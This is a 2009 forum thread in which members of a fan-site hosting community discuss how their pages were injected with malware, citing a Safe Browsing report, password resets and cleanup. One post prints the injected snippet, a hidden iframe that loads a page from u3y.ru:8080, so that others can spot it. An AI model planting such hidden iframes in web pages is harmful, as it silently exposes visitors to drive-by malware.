I was just looking though HF's directory and noticed a few pages had been updated without my knowledge. Turns out FreedomForceForever may have been targeted with malware. I've gone in replaced the malware files and made all the html files readonly but all the other sites hosted on FFF should probably check their last modified date.
QuoteSafe Browsing
Diagnostic page for u3y.ru
What is the current listing status for u3y.ru?
Site is listed as suspicious - visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-07-14, and the last time suspicious content was found on this site was on 2009-07-14.
Malicious software includes 3 trojan(s), 3 exploit(s).
This site was hosted on 8 network(s) including AS8560 (SCHLUND), AS12301 (INVITEL), AS8972 (PLUSSERVER).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, u3y.ru appeared to function as an intermediary for the infection of 3 site(s) including wcpas.com/, holm-sorensen.com/, icicijobs.in/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 8 domain(s), including wcpas.com/, holm-sorensen.com/, icicijobs.in/.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
FreedomForceForever.com is ok to visit again! Yah!PS - The malware is attached to the index.html btw.
To identify the malware code find this line of code -
<iframe src="http://u3y.ru:8080/index.php" width=148 height=149 style="visibility: hidden"></iframe> DO NOT CLICK THE LINK IN THIS LINE OF CODE IT IS FOR IDENTIFYING PURPOSES ONLY!
Just checked my index and I'm pretty sure that I'm "clean".
Quote from: tommyboy on July 14, 2009, 03:06:12 PM
Just checked my index and I'm pretty sure that I'm "clean".
You are.
I wonder what caused this, has anyone told cat
Quote from: the_ultimate_evil on July 14, 2009, 04:16:11 PM
I wonder what caused this, ha anyone told cat
The Google message says third parties add malicious code to legitimate sites. So I can only assume a malware bot added after getting in somehow.
I double checked all my files on my computer and none of them had the code and the ftp client shows it was edited in the heroforce folder on a day I didn't update anything (July 13, 2009).
As soon as I noticed it I posted it here to protect everyone.
hmm i'm 99.9% sure i wasn't in the server yesterday, but i'll run spybot etc just to be sure
Is it odd that my first reaction to your post was not "Heroforce had Malware? I'd better run a scan because I've opened it recently!" but "ZOMG, update!!!! YAY!"
AA, to avoid accidents, I changed the link in the first post so that it's not clickable. (Some browsers pre-load parts of links on pages to make loading faster.)
BTW, I did a quick search for u3y.ru on freedomforceforever.com and didn't comeup with any hits.
Quote from: Tomato on July 14, 2009, 05:00:09 PM
Is it odd that my first reaction to your post was not "Heroforce had Malware? I'd better run a scan because I've opened it recently!" but "ZOMG, update!!!! YAY!"
That is pretty bad. :P Maybe we should update or something...
Quote from: stumpy on July 14, 2009, 05:03:39 PM
AA, to avoid accidents, I changed the link in the first post so that it's not clickable. (Some browsers pre-load parts of links on pages to make loading faster.)
BTW, I did a quick search for u3y.ru on freedomforceforever.com and didn't comeup with any hits.
Good. Maybe it was an isolated incident but I did notice some unusual traffic from Russia to the site in the last week.
woo scary.
just did a scan with spybot and superantispyware got nothing
I think all of these hacks & other attacks we've been seeing are all being directed by Nuclear Winter. He didn't like that he was portrayed as a "villian", and his collection of teddy bears was completely glossed over. :P
This is a very busy week for me. I'm supposed to be somewhere right now and will be heading out in a minute, but when I get the time, I'll start sifting through web pages to see if it crawled into anything else. That won't be until Saturday at the earliest. If anyone feels like doing this for me, preferably someone already being hosted, I can give you full site access. Otherwise, it will have to wait for now.
You all may want to stay aware from hosted sites that haven't been confirmed as clean (so far tommyboy's site and Hero Force.)
I don't know where to ask this so I'll ask it here, why does the hero force site says "Sorry, Were Closed"? Was it hacked/attacked again?
Quote from: GGiant on July 20, 2009, 06:48:47 PM
I don't know where to ask this so I'll ask it here, why does the hero force site says "Sorry, Were Closed"? Was it hacked/attacked again?
Yeah we are still experiencing some malware errors so in order to protect the community we are closing for the indefinite future. Don't worry my newest work will probably be available on my blog in the coming weeks.
Sorry about all this guys. I guess I need to start checking the other sites, although I have a feeling it isn't widespread.
On a better note, I was just informed that they are changing my plan to give me unlimited bandwidth and more storage space for just $1 more per month.
Quote from: catwhowalksbyhimself on July 20, 2009, 08:55:44 PM
Sorry about all this guys. I guess I need to start checking the other sites, although I have a feeling it isn't widespread.
On a better note, I was just informed that they are changing my plan to give me unlimited bandwidth and more storage space for just $1 more per month.
It's ok. This is probably for the best for all of HeroForce right now. We have so much stuff going on and I don't think any of us were expecting to update any time soon. As for the bandwidth, awesome!
YOU WILL BE ASSIMILATED!
Resistance is futile. All are Champions, Champions are all.
I guess I'll have to wait then, :thumbup: for unlimited bandwidth and more storage space.
Champions? Bah, just because Murs did the actual site attacking does not give you conquering rights. WE'RE the ones who had to buy the sweets to con him into actually doing it.
mmmmmmm pop tarts
*nom nom nom nom*
Dammit Murs...we can't take you anywhere! :angry: :P :lol:
Please note that if you are currently getting hosting with me and are on the forth group, your password has now been changed. Contact me and I'll give you the new one.
Alright, I think I've tracked this thing down.
I think someone in group 4 has had his information stolen, either by being hacked, or perhaps by a friend who should not be given that title. Likely the former. The password has been changed, so that should stop that. However, one other site in group 4 was effected, namely http://thedod.freedomforceforever.com/
It is recommended that you not go to this site until it is cleaned up.
All other sub-sites, however are safe.
In addition, Google has hero force listed as an attack site. I do hope it wasn't one of you who reported it, because Google says it was only reported once. In any case, when the site is reopened, you will be able to safely ignore any warnings about it being an attack site.
how would you know if you've been hacked, i've checked with avg and 5 different spyware applications, and got a clean bill
That's all you can do really.
My provider recommends wiping out the hard drive and starting over, but I don't recommend that for now.
You'd also want a good firewall. If you don't have one, then that might be the problem, but I'm assuming that you do.
Actually, it could be any of those with access to group 4 that are effected. I've only given the new password to AA and Lunarman so far, though, so that should help narrow things down.
honestly i'm 99.9999% sure it's not me, but it's kinda worrying overall with this situation
Don't be. I'm fairly sure it's just that someone got the password, and I won't give people the new one unless they ask me, and I'll give some instructions to make sure they are secured properly. I'm very hopeful that this will be the end of it.
Quote from: catwhowalksbyhimself on July 26, 2009, 10:43:07 PM
Don't be. I'm fairly sure it's just that someone got the password, and I won't give people the new one unless they ask me, and I'll give some instructions to make sure they are secured properly. I'm very hopeful that this will be the end of it.
I've just gone in again and cleaned up the code. I also contacted Google to review the site again.
I'll run some scans tonight when I get home to my computer.
Hopefully we're at the end of this mess.
Quote from: catwhowalksbyhimself on July 26, 2009, 10:43:07 PM
Don't be. I'm fairly sure it's just that someone got the password, and I won't give people the new one unless they ask me, and I'll give some instructions to make sure they are secured properly. I'm very hopeful that this will be the end of it.
the question is how did they get the password, i'm running vista, avg and spybot along with no script,adblock plus and web of trust. so i hope that it wasn't me. though when the first attack happened i hadn't accessed HF in a long long time
Quote from: the_ultimate_evil on July 26, 2009, 11:28:23 PM
Quote from: catwhowalksbyhimself on July 26, 2009, 10:43:07 PM
Don't be. I'm fairly sure it's just that someone got the password, and I won't give people the new one unless they ask me, and I'll give some instructions to make sure they are secured properly. I'm very hopeful that this will be the end of it.
the question is how did they get the password, i'm running vista, avg and spybot along with no script,adblock plus and web of trust. so i hope that it wasn't me. though when the first attack happened i hadn't accessed HF in a long long time
I'm on vista as well with clamwin, spybot, and malewarebyte (I recommend this to everyone).
Quotethe question is how did they get the password
There are currently half a dozen sites using that login. It could conceivably be any of them. Many haven't been active in a while, and therefore would be unlikely to notice.